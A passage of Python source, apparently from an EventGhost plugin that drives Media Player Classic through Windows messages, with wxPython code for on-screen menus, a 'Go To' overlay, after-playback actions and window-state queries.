hWnd,\n evtList,\n ix = 0\n ):\n self.fore = fore\n self.back = back\n self.foreSel = foreSel\n self.backSel = backSel\n self.fontInfo = fontInfo\n self.flag = flag\n self.plugin = plugin\n self.monitor = monitor\n self.hWnd = hWnd\n self.evtList = evtList\n eg.TriggerEvent(\"OSD.%s\" % self.plugin.text.opened, prefix = \"MPC\")\n for 
evt in self.evtList[0]:\n eg.Bind(evt, self.onUp)\n for evt in self.evtList[1]:\n eg.Bind(evt, self.onDown)\n for evt in self.evtList[2]:\n eg.Bind(evt, self.onLeft)\n for evt in self.evtList[3]:\n eg.Bind(evt, self.onRight)\n for evt in self.evtList[4]:\n eg.Bind(evt, self.onEscape)\n if self.plugin.GetWindowState() == 4: # Fullscreen !\n SendMessageTimeout(self.hWnd, WM_COMMAND, 830, 0)\n self.messStack.append(830)\n sleep(0.1)\n self.menu = GetMenu(hWnd)\n while not self.menu:\n SendMessageTimeout(self.hWnd, WM_COMMAND, 817, 0)\n self.messStack.append(817)\n sleep(0.1)\n self.menu = GetMenu(hWnd)\n self.items = GetItemList(self.menu, self.hWnd)\n self.choices = [item[0] for item in self.items]\n self.menuGridCtrl = MenuGrid(self,len(self.choices))\n mainSizer = wx.BoxSizer(wx.VERTICAL)\n self.SetSizer(mainSizer)\n mainSizer.Add(self.menuGridCtrl, 0, wx.EXPAND)\n self.Bind(wx.EVT_CLOSE, self.onClose)\n self.Bind(gridlib.EVT_GRID_CMD_CELL_LEFT_DCLICK, self.onDoubleClick, self.menuGridCtrl)\n self.Bind(wx.EVT_CHAR_HOOK, self.onFrameCharHook)\n font = wx.FontFromNativeInfoString(fontInfo)\n self.menuGridCtrl.SetFont(font)\n arial = wx.FontFromNativeInfoString(arialInfoString)\n self.SetFont(font)\n hght = self.GetTextExtent('X')[1]\n for n in range(1,1000):\n arial.SetPointSize(n)\n self.SetFont(arial)\n h = self.GetTextExtent(u\"\\u25a0\")[1]\n if h > hght:\n break\n arial.SetPointSize(2*n/3)\n self.SetFont(arial)\n self.w0 = 2 * self.GetTextExtent(u\"\\u25a0\")[0]\n attr = gridlib.GridCellAttr()\n attr.SetFont(arial)\n attr.SetAlignment(wx.ALIGN_CENTRE, wx.ALIGN_CENTRE)\n self.menuGridCtrl.SetColAttr(0,attr)\n for n in range(1,1000):\n arial.SetPointSize(n)\n self.SetFont(arial)\n h = self.GetTextExtent(u\"\\u25ba\")[1]\n if h > hght:\n break\n arial.SetPointSize(n/2)\n self.SetFont(arial)\n self.w2 = 2 * self.GetTextExtent(u\"\\u25ba\")[0]\n attr = gridlib.GridCellAttr()\n attr.SetFont(arial)\n attr.SetAlignment(wx.ALIGN_RIGHT, wx.ALIGN_CENTRE)\n self.menuGridCtrl.SetColAttr(2,attr)\n self.SetFont(font)\n self.SetBackgroundColour((0, 0, 0))\n self.menuGridCtrl.SetBackgroundColour(self.back)\n self.menuGridCtrl.SetForegroundColour(self.fore)\n self.menuGridCtrl.SetSelectionBackground(self.backSel)\n self.menuGridCtrl.SetSelectionForeground(self.foreSel)\n if self.flag:\n self.timer=MyTimer(t = 5.0, plugin = self.plugin)\n self.DrawMenu(ix)\n wx.Yield()\n SetEvent(event)\n\n\n def UpdateMenu(self, ix=0):\n self.items = GetItemList(self.menu, self.hWnd)\n if len(self.items)==0:\n PlaySound('SystemExclamation', SND_ASYNC)\n self.menu,ix = self.oldMenu.pop()\n self.items = GetItemList(self.menu, self.hWnd)\n self.choices = [item[0] for item in self.items]\n self.menuGridCtrl.Set(self.items)\n self.DrawMenu(ix)\n\n\n def MoveCursor(self, step):\n max=len(self.choices)\n if max > 0:\n self.menuGridCtrl.MoveCursor(step)\n\n\n def onUp(self, event):\n wx.CallAfter(self.menuGridCtrl.MoveCursor, -1)\n return True #stop processing this event !!!\n\n\n def onDown(self, event):\n wx.CallAfter(self.menuGridCtrl.MoveCursor, 1)\n return True #stop processing this event !!!\n\n\n def onLeft(self, event):\n if len(self.oldMenu) > 0:\n self.menu, ix = self.oldMenu.pop()\n wx.CallAfter(self.UpdateMenu, ix)\n else:\n wx.CallAfter(self.destroyMenu)\n return True #stop processing this event !!!\n\n\n def onRight(self, event):\n wx.CallAfter(self.DefaultAction)\n return True #stop processing this event !!!\n\n\n def onEscape(self, event):\n wx.CallAfter(self.destroyMenu)\n return True #stop processing this event 
!!!\n\n\n def DefaultAction(self):\n sel = self.menuGridCtrl.GetSelection()\n item = self.items[sel]\n id = item[3]\n if id != -1:\n self.destroyMenu()\n SendMessage(self.hWnd, WM_COMMAND, id, 0)\n else:\n self.oldMenu.append((self.menu,sel))\n self.menu = GetSubMenu(self.menu, item[1])\n self.UpdateMenu()\n\n\n def onFrameCharHook(self, event):\n keyCode = event.GetKeyCode()\n if keyCode == wx.WXK_F4:\n if event.AltDown():\n self.destroyMenu()\n elif keyCode == wx.WXK_RETURN or keyCode == wx.WXK_NUMPAD_ENTER:\n self.DefaultAction()\n elif keyCode == wx.WXK_RIGHT or keyCode == wx.WXK_NUMPAD_RIGHT:\n self.DefaultAction()\n elif keyCode == wx.WXK_ESCAPE:\n self.destroyMenu()\n elif keyCode == wx.WXK_UP or keyCode == wx.WXK_NUMPAD_UP:\n self.menuGridCtrl.MoveCursor(-1)\n elif keyCode == wx.WXK_DOWN or keyCode == wx.WXK_NUMPAD_DOWN:\n self.menuGridCtrl.MoveCursor(1)\n elif keyCode == wx.WXK_LEFT or keyCode == wx.WXK_NUMPAD_LEFT:\n if len(self.oldMenu) > 0:\n self.menu, ix = self.oldMenu.pop()\n wx.CallAfter(self.UpdateMenu,ix)\n else:\n self.destroyMenu()\n else:\n event.Skip()\n\n\n def onDoubleClick(self, event):\n self.DefaultAction()\n event.Skip()\n\n\n def onClose(self, event):\n self.Show(False)\n self.Destroy()\n self.plugin.menuDlg = None\n\n\n def destroyMenu(self, event = None):\n cnt = self.messStack.count(817)\n if cnt:\n for i in range(4 - cnt):\n SendMessageTimeout(self.hWnd, WM_COMMAND, 817, 0)\n if self.messStack.count(830):\n SendMessageTimeout(self.hWnd, WM_COMMAND, 830, 0)\n for evt in self.evtList[0]:\n eg.Unbind(evt, self.onUp)\n for evt in self.evtList[1]:\n eg.Unbind(evt, self.onDown)\n for evt in self.evtList[2]:\n eg.Unbind(evt, self.onLeft)\n for evt in self.evtList[3]:\n eg.Unbind(evt, self.onRight)\n for evt in self.evtList[4]:\n eg.Unbind(evt, self.onEscape)\n if self.flag:\n self.timer.Cancel()\n eg.TriggerEvent(\"OSD.%s\" % self.plugin.text.closed, prefix = \"MPC\")\n self.Close()\n#===============================================================================\n\nclass MyTimer():\n\n def __init__(self, t, plugin):\n self.timer = Timer(t, self.Run)\n self.plugin = plugin\n self.timer.start()\n\n\n def Run(self):\n try:\n self.plugin.menuDlg.destroyMenu()\n self.plugin.menuDlg = None\n except:\n pass\n\n\n def Cancel(self):\n self.timer.cancel()\n#===============================================================================\n\nclass AfterPlaybackOnce(eg.ActionClass):\n\n class text:\n label = \"Select action after playback:\"\n choices = (\n \"Exit\",\n \"Stand By\",\n \"Hibernate\",\n \"Shutdown\",\n \"Log Off\",\n \"Lock\"\n )\n\n\n def __call__(self, action = -1):\n if action > -1:\n if self.plugin.runFlg and self.plugin.mpcHwnd:\n return SendMessage(self.plugin.mpcHwnd, WM_COMMAND, action + 912, 0)\n else:\n raise self.Exceptions.ProgramNotRunning\n\n\n def GetLabel(self, action):\n return \"%s: %s\" % (self.name, self.text.choices[action])\n\n\n def Configure(self, action = -1):\n panel = eg.ConfigPanel()\n label = wx.StaticText(panel, -1, self.text.label)\n ctrl = wx.Choice(panel, -1, choices = self.text.choices)\n eg.EqualizeWidths((label, ctrl))\n ctrl.SetSelection(action)\n panel.sizer.Add(label, 0, wx.TOP, 20)\n panel.sizer.Add(ctrl, 0, wx.TOP, 3)\n while panel.Affirmed():\n panel.SetResult(ctrl.GetSelection())\n#===============================================================================\n\nclass AfterPlayback(eg.ActionClass):\n\n class text:\n label = \"Select action after playback (every time):\"\n choices = (\n \"Exit\",\n \"Do Nothing\",\n 
\"Play next in the folder\",\n )\n\n\n def __call__(self, action = -1):\n if action > -1:\n if self.plugin.runFlg and self.plugin.mpcHwnd:\n ids = (33411, 918, 33412)\n return SendMessageTimeout(\n self.plugin.mpcHwnd,\n WM_COMMAND,\n ids[action],\n 0\n )\n else:\n raise self.Exceptions.ProgramNotRunning\n\n\n def GetLabel(self, action):\n return \"%s: %s\" % (self.name, self.text.choices[action])\n\n\n def Configure(self, action = -1):\n panel = eg.ConfigPanel()\n label = wx.StaticText(panel, -1, self.text.label)\n ctrl = wx.Choice(panel, -1, choices = self.text.choices)\n eg.EqualizeWidths((label, ctrl))\n ctrl.SetSelection(action)\n panel.sizer.Add(label, 0, wx.TOP, 20)\n panel.sizer.Add(ctrl, 0, wx.TOP, 3)\n while panel.Affirmed():\n panel.SetResult(ctrl.GetSelection())\n#===============================================================================\n\nclass UserMessage(eg.ActionClass):\n\n name = \"Send user's message\"\n description = u\"\"\"**Sends user's message.**\n\nIf you can not find in the menu of features some of the functions you can get it (maybe) add yourself.\nGo to the menu \"**View - Options... - Player - Hotkeys**\".\nIf you find there a function, what you need, then write the number that is in the column \"**ID**\".\nType this number into the edit box \"**User message ID:**\".\nYou can of course also use an expression such as **{eg.result}** or **{eg.event.payload}**.\"\"\"\n\n\n class text:\n label = \"User message ID:\"\n error = \"ValueError: invalid literal for int() with base 10: '%s'\"\n\n\n\n def __call__(self, val=\"\"):\n if self.plugin.runFlg and self.plugin.mpcHwnd:\n try:\n val = eg.ParseString(val)\n val = int(val)\n except:\n raise self.Exception(self.text.error % val)\n return\n return SendMessage(self.plugin.mpcHwnd, WM_COMMAND, val, 0)\n else:\n raise self.Exceptions.ProgramNotRunning\n\n\n def Configure(self, val=\"\"):\n panel = eg.ConfigPanel()\n textLabel = wx.StaticText(panel, -1, self.text.label)\n textControl = wx.TextCtrl(panel, -1, val, size = (200,-1))\n panel.sizer.Add(textLabel, 0, wx.TOP, 20)\n panel.sizer.Add(textControl, 0, wx.TOP, 3)\n while panel.Affirmed():\n panel.SetResult(textControl.GetValue())\n#===============================================================================\n\nclass ActionPrototype(eg.ActionBase):\n\n def __call__(self):\n if self.plugin.runFlg and self.plugin.mpcHwnd:\n wx.CallAfter(SendMessage,self.plugin.mpcHwnd, WM_COMMAND, self.value, 0)\n#===============================================================================\n\nclass GetWindowState(eg.ActionBase):\n\n class text:\n rbLabel = \"Result type choice\"\n numVal = \"Return a numeric value\"\n strVal = \"Return a string value\"\n boolVal = \"Return True when window is \"\n triggEvent = \"Trigger an event\"\n evtPrefix = \"Event prefix (or prefix and first suffix):\"\n states = (\n \"Not running\",\n \"Tray icon\",\n \"Normal\",\n \"Minimized\",\n \"Maximized\",\n \"Full screen\",\n )\n\n def __call__(self, mode = 0, state = 5, evnt = False, prefix = \"MPCHC.Window\"):\n stt = self.plugin.GetWindowState()\n if evnt:\n eg.TriggerEvent(\n \"\".join([word.capitalize() for word in self.text.states[stt+1].split()]),\n prefix = prefix\n )\n if mode == 0:\n return stt\n elif mode == 1:\n return self.text.states[stt+1]\n else:\n return stt == state-1\n\n\n def Configure(self, mode = 0, state = 5, evnt = False, prefix = \"MPCHC.Window\"):\n self.stt = state\n panel=eg.ConfigPanel(self)\n topSizer = wx.StaticBoxSizer(\n wx.StaticBox(panel, -1, 
self.text.rbLabel),\n wx.VERTICAL\n )\n boolSizer = wx.BoxSizer(wx.HORIZONTAL)\n rb0 = panel.RadioButton(mode==0, self.text.numVal, style=wx.RB_GROUP)\n rb1 = panel.RadioButton(mode==1, self.text.strVal)\n rb2 = panel.RadioButton(mode==2, self.text.boolVal)\n statChoice = wx.Choice(panel, -1, choices = self.text.states)\n statChoice.Select(state)\n triggCtrl = wx.CheckBox(panel, -1, self.text.triggEvent)\n triggCtrl.SetValue(evnt)\n prefixLabel = wx.StaticText(panel, -1, self.text.evtPrefix)\n prefixCtrl = wx.TextCtrl(panel, -1, prefix)\n prefixSizer = wx.BoxSizer(wx.HORIZONTAL)\n prefixSizer.Add(prefixLabel,0,wx.TOP,3)\n prefixSizer.Add(prefixCtrl,0,wx.LEFT,6)\n boolSizer.Add(rb2,0,wx.TOP,3)\n boolSizer.Add(statChoice)\n topSizer.Add(rb0,0,wx.TOP,3)\n topSizer.Add(rb1,0,wx.TOP,7)\n topSizer.Add(boolSizer,0,wx.TOP,5)\n panel.sizer.Add(topSizer)\n panel.sizer.Add(triggCtrl, 0, wx.TOP, 10)\n panel.sizer.Add(prefixSizer, 0, wx.TOP, 10)\n\n def onTriggCtrl(evt = None):\n flg = triggCtrl.GetValue()\n prefixLabel.Show(flg)\n prefixCtrl.Show(flg)\n if evt:\n evt.Skip()\n triggCtrl.Bind(wx.EVT_CHECKBOX, onTriggCtrl)\n onTriggCtrl()\n\n def onState(evt):\n self.stt = evt.GetSelection()\n evt.Skip()\n statChoice.Bind(wx.EVT_CHOICE, onState)\n\n def onRadio(evt = None):\n flg = rb2.GetValue()\n statChoice.Enable(flg)\n sel = self.stt if flg else -1\n statChoice.SetSelection(sel)\n if evt:\n evt.Skip()\n rb0.Bind(wx.EVT_RADIOBUTTON, onRadio)\n rb1.Bind(wx.EVT_RADIOBUTTON, onRadio)\n rb2.Bind(wx.EVT_RADIOBUTTON, onRadio)\n onRadio()\n\n while panel.Affirmed():\n state = state if self.stt == -1 else self.stt\n panel.SetResult(\n (rb0.GetValue(),rb1.GetValue(),rb2.GetValue()).index(True),\n state,\n triggCtrl.GetValue(),\n prefixCtrl.GetValue()\n )\n#===============================================================================\n\nclass GetPlayState(eg.ActionBase):\n\n class text:\n rbLabel = \"Result type choice\"\n numVal = \"Return a numeric value\"\n strVal = \"Return a string value\"\n boolVal = \"Return True when play state is \"\n states = (\"Playing\", \"Paused\", \"Stopped\", \"Unknown\")\n\n def __call__(self, mode = 0, state = 0):\n stt = self.plugin.playstate\n if mode == 0:\n return stt\n elif mode == 1:\n return self.text.states[stt]\n else:\n return stt == state\n\n\n def Configure(self, mode = 0, state = 0):\n self.stt = state\n panel=eg.ConfigPanel(self)\n topSizer = wx.StaticBoxSizer(\n wx.StaticBox(panel, -1, self.text.rbLabel),\n wx.VERTICAL\n )\n boolSizer = wx.BoxSizer(wx.HORIZONTAL)\n rb0 = panel.RadioButton(mode==0, self.text.numVal, style=wx.RB_GROUP)\n rb1 = panel.RadioButton(mode==1, self.text.strVal)\n rb2 = panel.RadioButton(mode==2, self.text.boolVal)\n statChoice = wx.Choice(panel, -1, choices = self.text.states)\n statChoice.Select(state)\n boolSizer.Add(rb2,0,wx.TOP,3)\n boolSizer.Add(statChoice)\n topSizer.Add(rb0,0,wx.TOP,3)\n topSizer.Add(rb1,0,wx.TOP,7)\n topSizer.Add(boolSizer,0,wx.TOP,5)\n panel.sizer.Add(topSizer)\n\n\n def onState(evt):\n self.stt = evt.GetSelection()\n evt.Skip()\n statChoice.Bind(wx.EVT_CHOICE, onState)\n\n def onRadio(evt = None):\n flg = rb2.GetValue()\n statChoice.Enable(flg)\n sel = self.stt if flg else -1\n statChoice.SetSelection(sel)\n if evt:\n evt.Skip()\n rb0.Bind(wx.EVT_RADIOBUTTON, onRadio)\n rb1.Bind(wx.EVT_RADIOBUTTON, onRadio)\n rb2.Bind(wx.EVT_RADIOBUTTON, onRadio)\n onRadio()\n\n while panel.Affirmed():\n state = state if self.stt == -1 else self.stt\n panel.SetResult(\n 
(rb0.GetValue(),rb1.GetValue(),rb2.GetValue()).index(True),\n state,\n )\n#===============================================================================\n\nclass GetNowPlaying(eg.ActionBase):\n\n def __call__(self):\n hWnd = Find_MPC()\n if not hWnd:\n raise self.Exceptions.ProgramNotRunning\n hWnd = hWnd[0]\n title = GetWindowText(hWnd)\n if not title.startswith(\"Media Player Classic\"):\n ix = title.rfind(\".\")\n if ix > -1:\n return title[:ix]\n#===============================================================================\n\nclass GetTimes(eg.ActionBase):\n\n name = \"Get Times\"\n description = \"Returns elapsed, remaining and total times.\"\n\n def __call__(self):\n if self.plugin.runFlg and self.plugin.mpcHwnd:\n try:\n child = GetDlgItem(self.plugin.mpcHwnd, 10021)\n if GetClassName(child) == \"#32770\":\n statText = GetDlgItem(child, 12027)\n if GetClassName(statText) == \"Static\":\n elaps, total = GetWindowText(statText).split(\" / \")\n elaps = GetSec(elaps)\n totSec = GetSec(total)\n rem = strftime('%H:%M:%S', gmtime(totSec-elaps))\n elaps = strftime('%H:%M:%S', gmtime(elaps))\n total = strftime('%H:%M:%S', gmtime(totSec))\n except:\n return None, None, None\n return elaps, rem, total\n else:\n eg.programCounter = None\n raise self.Exceptions.ProgramNotRunning\n#===============================================================================\n\nclass GoTo_OSD(eg.ActionBase):\n\n name = 'On Screen Go To ...'\n description = 'Show On Screen \"Go To ...\".'\n\n panel = None\n\n class text:\n OSELabel = '\"Go To...\" show on:'\n menuPreview = '\"Go To...\" OSD preview:'\n txtColour = 'Text colour'\n background = 'Background colour'\n txtColourSel = 'Selected text colour'\n backgroundSel = 'Selected background colour'\n gotoLabel = 'Go To...'\n dialog = \"Events ...\"\n btnToolTip = '''Press this button to assign events to control the \"Go To...\" OSD !!!'''\n evtAssignTitle = '\"Go To...\" OSD control - events assignement'\n events = (\n \"Digit increment:\",\n \"Digit decrement:\",\n \"Kursor left:\",\n \"Kursor right:\",\n \"Cancel (Escape):\",\n )\n fontFace = \"Select font face\"\n fontSize = \"Select font size\"\n inverted = \"Use inverted colours\"\n\n def __call__(\n self,\n fore,\n back,\n faceFont,\n sizeFont,\n monitor,\n foreSel,\n backSel,\n evtList,\n sizeFlag,\n inverted\n ):\n if self.plugin.runFlg and self.plugin.mpcHwnd:\n if not self.plugin.menuDlg:\n self.plugin.menuDlg = GoToFrame()\n self.event = CreateEvent(None, 0, 0, None)\n wx.CallAfter(self.plugin.menuDlg.ShowGoToFrame,\n fore,\n back,\n foreSel,\n backSel,\n faceFont,\n sizeFont,\n False,\n self.plugin,\n self.event,\n monitor,\n self.plugin.mpcHwnd,\n evtList,\n sizeFlag\n )\n eg.actionThread.WaitOnEvent(self.event)\n else:\n eg.programCounter = None\n raise self.Exceptions.ProgramNotRunning\n\n\n def GetLabel(\n self,\n fore,\n back,\n faceFont,\n sizeFont,\n monitor,\n foreSel,\n backSel,\n evtList,\n sizeFlag,\n inverted\n ):\n return self.name\n\n\n def Configure(\n self,\n fore = (75, 75, 75),\n back = (180, 180, 180),\n faceFont = \"Courier New\",\n sizeFont = 40,\n monitor = 0,\n foreSel = (180, 180, 180),\n backSel = (75, 75, 75),\n evtList = [[],[],[],[],[]],\n sizeFlag = False,\n inverted = True\n ):\n self.fore = fore\n self.back = back\n self.foreSel = foreSel\n self.backSel = backSel\n self.oldSel=0\n self.inverted = inverted\n global panel\n panel = eg.ConfigPanel(self)\n panel.evtList = cpy(evtList)\n previewLbl=wx.StaticText(panel, -1, self.text.menuPreview)\n displayChoice = 
eg.DisplayChoice(panel, monitor)\n w = displayChoice.GetSize()[0]\n OSElbl = wx.StaticText(panel, -1, self.text.OSELabel)\n #Button Text Colour\n foreLbl=wx.StaticText(panel, -1, self.text.txtColour+':')\n foreColourButton = eg.ColourSelectButton(panel,fore, title = self.text.txtColour)\n #Button Background Colour\n backLbl=wx.StaticText(panel, -1, self.text.background+':')\n backColourButton = eg.ColourSelectButton(panel,back, title = self.text.background)\n #Button Selected Text Colour\n foreSelLbl=wx.StaticText(panel, -1, self.text.txtColourSel+':')\n foreSelColourButton = eg.ColourSelectButton(panel,foreSel, title = self.text.txtColourSel)\n #Button Selected Background Colour\n backSelLbl=wx.StaticText(panel, -1, self.text.backgroundSel+':')\n backSelColourButton = eg.ColourSelectButton(panel,backSel, title = self.text.backgroundSel)\n #Button Dialog \"Menu control - assignement of events\"\n dialogButton = wx.Button(panel,-1,self.text.dialog, size = (w, -1))\n dialogButton.SetToolTipString(self.text.btnToolTip)\n foreSelLbl.Enable(not inverted)\n foreSelColourButton.Enable(not inverted)\n backSelLbl.Enable(not inverted)\n backSelColourButton.Enable(not inverted)\n #Use inverted colours checkbox\n useInvertedCtrl = wx.CheckBox(panel, -1, self.text.inverted)\n useInvertedCtrl.SetValue(inverted)\n #Sizers\n mainSizer = panel.sizer\n topSizer=wx.GridBagSizer(2, 30)\n mainSizer.Add(topSizer)\n topSizer.Add(previewLbl,(0, 0),flag = wx.TOP,border = 0)\n topSizer.Add((160,-1),(1, 0),(3, 1),flag = wx.EXPAND)\n topSizer.Add(foreLbl,(0, 1),flag = wx.TOP,border = 0)\n topSizer.Add(foreColourButton,(1, 1),flag = wx.TOP)\n topSizer.Add(backLbl,(2, 1),flag = wx.TOP,border = 8)\n topSizer.Add(backColourButton,(3, 1),flag = wx.TOP)\n topSizer.Add(foreSelLbl,(4, 1), (1, 2), flag = wx.TOP,border = 8)\n topSizer.Add(foreSelColourButton, (5, 1), flag = wx.TOP)\n topSizer.Add(backSelLbl,(6, 1), (1, 2), flag = wx.TOP,border = 8)\n topSizer.Add(backSelColourButton, (7, 1), flag = wx.TOP)\n topSizer.Add(useInvertedCtrl, (8, 1))\n topSizer.Add(OSElbl,(0, 2), flag = wx.TOP)\n topSizer.Add(displayChoice,(1, 2),flag = wx.TOP)\n topSizer.Add(dialogButton, (3, 2), flag = wx.TOP)\n #Font face\n fw = FixedWidth()\n fw.EnumerateFacenames(wx.FONTENCODING_SYSTEM, fixedWidthOnly = True)\n fw.fontList.sort()\n fontFaceLbl=wx.StaticText(panel, -1, self.text.fontFace+':')\n topSizer.Add(fontFaceLbl,(4, 0),(1, 1), flag = wx.TOP,border = 8)\n fontFaceCtrl = wx.Choice(panel, -1, choices = fw.fontList, size =(160,-1))\n fontFaceCtrl.SetStringSelection(faceFont)\n topSizer.Add(fontFaceCtrl,(5, 0),(1, 1), flag = wx.TOP)\n #Font size\n fontSizeLbl=wx.StaticText(panel, -1, self.text.fontSize+':')\n topSizer.Add(fontSizeLbl,(6, 0),(1, 1), flag = wx.TOP,border = 8)\n\n def LevelCallback(value):\n if value != sizeFont:\n panel.SetIsDirty()\n return str(value)\n\n fontSizeCtrl = eg.Slider(\n panel,\n value = sizeFont,\n min=20,\n max=120,\n style = wx.SL_TOP,\n size=(160,-1),\n levelCallback=LevelCallback\n )\n fontSizeCtrl.SetMinSize((160, -1))\n topSizer.Add(fontSizeCtrl,(7, 0),(1, 1), flag = wx.TOP)\n panel.sizer.Layout()\n spacer = topSizer.GetChildren()[1]\n ps = spacer.GetPosition()\n sz = spacer.GetSize()\n previewPanel = wx.Panel(panel, -1, pos = (ps[0], ps[1]+2), size = sz, style = wx.BORDER_SIMPLE)\n gotoLbl=wx.StaticText(previewPanel, -1, self.text.gotoLabel, pos = (5,5))\n gotoLbl.SetBackgroundColour(self.back)\n gotoLbl.SetForegroundColour(self.fore)\n gt = gotoLbl.GetTextExtent(self.text.gotoLabel)\n fnt = 
gotoLbl.GetFont()\n fnt.SetPointSize(12)\n fnt.SetWeight(wx.FONTWEIGHT_BOLD)\n gotoLbl.SetFont(fnt)\n GoToCtrl = wx.TextCtrl(\n previewPanel,\n -1,\n style=wx.TE_RICH2|wx.NO_BORDER|wx.TE_READONLY|wx.TE_CENTER,\n )\n GoToCtrl.SetValue(\"01:25:30\")\n fnt.SetPointSize(20)\n GoToCtrl.SetFont(fnt)\n previewPanel.SetBackgroundColour(self.back)\n GoToCtrl.SetBackgroundColour(self.back)\n\n def OnFontFaceChoice(event = None):\n fnt.SetFaceName(fontFaceCtrl.GetStringSelection())\n GoToCtrl.SetFont(fnt)\n if GoToCtrl.GetTextExtent(\"01:25:30\")[0] < 120:\n self.sizeFlag = True\n else:\n self.sizeFlag = False\n te = GoToCtrl.GetTextExtent(\"01:25:30\")\n GoToCtrl.SetSize((158, te[1]))\n GoToCtrl.SetPosition((1, 5+gt[1]+(sz[1]-gt[1]-te[1])/2))\n pos = 3\n GoToCtrl.SetStyle(0, pos, wx.TextAttr(self.fore, self.back, fnt))\n GoToCtrl.SetStyle(pos, pos+1, wx.TextAttr(self.foreSel, self.backSel, fnt))\n GoToCtrl.SetStyle(pos+1, 8, wx.TextAttr(self.fore, self.back, fnt))\n if event:\n event.Skip()\n fontFaceCtrl.Bind(wx.EVT_CHOICE, OnFontFaceChoice)\n OnFontFaceChoice()\n\n\n def OnInverted(evt):\n flag = evt.IsChecked()\n foreSelLbl.Enable(not flag)\n foreSelColourButton.Enable(not flag)\n backSelLbl.Enable(not flag)\n backSelColourButton.Enable(not flag)\n self.inverted = flag\n if flag:\n backSelColourButton.SetValue(foreColourButton.GetValue())\n foreSelColourButton.SetValue(backColourButton.GetValue())\n self.backSel = self.fore\n self.foreSel = self.back\n previewPanel.Refresh()\n OnFontFaceChoice()\n evt.Skip\n useInvertedCtrl.Bind(wx.EVT_CHECKBOX, OnInverted)\n\n\n def OnDialogBtn(evt):\n dlg = MenuEventsDialog(\n parent = panel,\n plugin = self.plugin,\n )\n dlg.Centre()\n wx.CallAfter(dlg.ShowMenuEventsDialog, self.text.evtAssignTitle, self.text.events)\n evt.Skip()\n dialogButton.Bind(wx.EVT_BUTTON, OnDialogBtn)\n\n\n def OnColourBtn(evt):\n id = evt.GetId()\n value = evt.GetValue()\n if id == foreColourButton.GetId():\n self.fore = value\n gotoLbl.SetForegroundColour(value)\n if self.inverted:\n self.backSel = value\n backSelColourButton.SetValue(value)\n elif id == backColourButton.GetId():\n self.back = value\n GoToCtrl.SetBackgroundColour(value)\n previewPanel.SetBackgroundColour(value)\n gotoLbl.SetBackgroundColour(value)\n if self.inverted:\n self.foreSel = value\n foreSelColourButton.SetValue(value)\n elif id == foreSelColourButton.GetId():\n self.foreSel = value\n elif id == backSelColourButton.GetId():\n self.backSel = value\n previewPanel.Refresh()\n OnFontFaceChoice()\n evt.Skip()\n foreColourButton.Bind(eg.EVT_VALUE_CHANGED, OnColourBtn)\n backColourButton.Bind(eg.EVT_VALUE_CHANGED, OnColourBtn)\n foreSelColourButton.Bind(eg.EVT_VALUE_CHANGED, OnColourBtn)\n backSelColourButton.Bind(eg.EVT_VALUE_CHANGED, OnColourBtn)\n\n def setFocus():\n pass\n panel.setFocus = setFocus\n\n # re-assign the test button\n def OnButton(event):\n if self.plugin.runFlg and self.plugin.mpcHwnd:\n if not self.plugin.menuDlg:\n self.plugin.menuDlg = GoToFrame()\n self.event = CreateEvent(None, 0, 0, None)\n wx.CallAfter(self.plugin.menuDlg.ShowGoToFrame,\n foreColourButton.GetValue(),\n backColourButton.GetValue(),\n foreSelColourButton.GetValue(),\n backSelColourButton.GetValue(),\n fontFaceCtrl.GetStringSelection(),\n fontSizeCtrl.GetValue(),\n True,\n self.plugin,\n self.event,\n displayChoice.GetSelection(),\n self.plugin.mpcHwnd,\n panel.evtList,\n self.sizeFlag\n )\n eg.actionThread.WaitOnEvent(self.event)\n else:\n self.PrintError(eg.Classes.Exceptions.Text.ProgramNotRunning)\n 
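        # the preview handler bound below waits on self.event until
        # ShowGoToFrame signals it via SetEvent, the same handshake
        # that __call__ uses at runtime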
panel.dialog.buttonRow.testButton.Bind(wx.EVT_BUTTON, OnButton)\n\n while panel.Affirmed():\n panel.SetResult(\n foreColourButton.GetValue(),\n backColourButton.GetValue(),\n fontFaceCtrl.GetStringSelection(),\n fontSizeCtrl.GetValue(),\n displayChoice.GetSelection(),\n foreSelColourButton.GetValue(),\n backSelColourButton.GetValue(),\n panel.evtList,\n self.sizeFlag,\n useInvertedCtrl.GetValue()\n )\n#===============================================================================\n\nclass ShowMenu(eg.ActionClass):\n\n name = \"Show MPC menu\"\n description = \"Show MPC menu.\"\n panel = None\n\n class text:\n OSELabel = 'Menu show on:'\n menuPreview = 'MPC On Screen Menu preview:'\n menuFont = 'Font:'\n txtColour = 'Text colour'\n background = 'Background colour'\n txtColourSel = 'Selected text colour'\n backgroundSel = 'Selected background colour'\n dialog = \"Events ...\"\n btnToolTip = \"\"\"Press this button to assign events to control the menu !!!\"\"\"\n evtAssignTitle = \"Menu control - events assignement\"\n events = (\n \"Cursor up:\",\n \"Cursor down:\",\n \"Back from the (sub)menu:\",\n \"Submenu, or select an item:\",\n \"Cancel (Escape):\",\n )\n inverted = \"Use inverted colours\"\n\n\n def __call__(\n self,\n fore,\n back,\n fontInfo = arialInfoString,\n monitor = 0,\n foreSel = (180, 180, 180),\n backSel = (75, 75, 75),\n evtList = [],\n inverted = True\n ):\n if self.plugin.runFlg and self.plugin.mpcHwnd:\n if not self.plugin.menuDlg:\n self.plugin.menuDlg = Menu()\n self.event = CreateEvent(None, 0, 0, None)\n wx.CallAfter(self.plugin.menuDlg.ShowMenu,\n fore,\n back,\n foreSel,\n backSel,\n fontInfo,\n False,\n self.plugin,\n self.event,\n monitor,\n self.plugin.mpcHwnd,\n evtList,\n )\n eg.actionThread.WaitOnEvent(self.event)\n else:\n eg.programCounter = None\n raise self.Exceptions.ProgramNotRunning\n\n\n def GetLabel(\n self,\n fore,\n back,\n fontInfo,\n monitor,\n foreSel,\n backSel,\n evtList,\n inverted\n ):\n return self.name\n\n\n def Configure(\n self,\n fore = (75, 75, 75),\n back = (180, 180, 180),\n fontInfo = arialInfoString,\n monitor = 0,\n foreSel = (180, 180, 180),\n backSel = (75, 75, 75),\n evtList = [[],[],[],[],[]],\n inverted = True\n ):\n self.fontInfo = fontInfo\n self.fore = fore\n self.back = back\n self.foreSel = foreSel\n self.backSel = backSel\n self.oldSel=0\n self.inverted = inverted\n global panel\n panel = eg.ConfigPanel(self)\n panel.evtList = cpy(evtList)\n previewLbl=wx.StaticText(panel, -1, self.text.menuPreview)\n listBoxCtrl = MenuGrid(panel, 3)\n items = ((\"Blabla_1\",0,True,804),\n (\"Blabla_2\",1,False,804),\n (\"Blabla_3\",2,False,-1),)\n 